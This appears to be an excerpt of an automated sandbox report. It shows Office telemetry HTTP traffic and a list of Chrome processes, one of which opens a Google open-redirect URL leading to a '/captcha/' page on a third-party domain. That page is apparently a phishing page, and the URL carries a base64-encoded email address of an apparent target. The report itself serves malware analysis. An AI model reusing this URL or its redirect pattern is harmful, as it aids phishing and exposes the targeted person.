                                                                              2024-10-26 06:49:47 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              148192.168.2.44990613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:48 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:48 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:48 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1366
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                              ETag: "0x8DC582BE5B7B174"
                                                                              x-ms-request-id: cf3e7330-401e-0078-5ca6-264d34000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064948Z-16849878b78wv88bk51myq5vxc00000002000000000044m0
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:48 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              149192.168.2.44990513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:48 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:48 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:48 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1403
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                              ETag: "0x8DC582BEB866CDB"
                                                                              x-ms-request-id: 9b3a7460-601e-003e-70a8-243248000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064948Z-15b8d89586fcvr6p5956n5d0rc00000007e000000000a8sa
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:48 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:02:48:31
                                                                              Start date:26/10/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:2
                                                                              Start time:02:48:34
                                                                              Start date:26/10/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2004,i,6732713318818398282,15989953615233870441,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:02:48:37
                                                                              Start date:26/10/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20"
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              No disassembly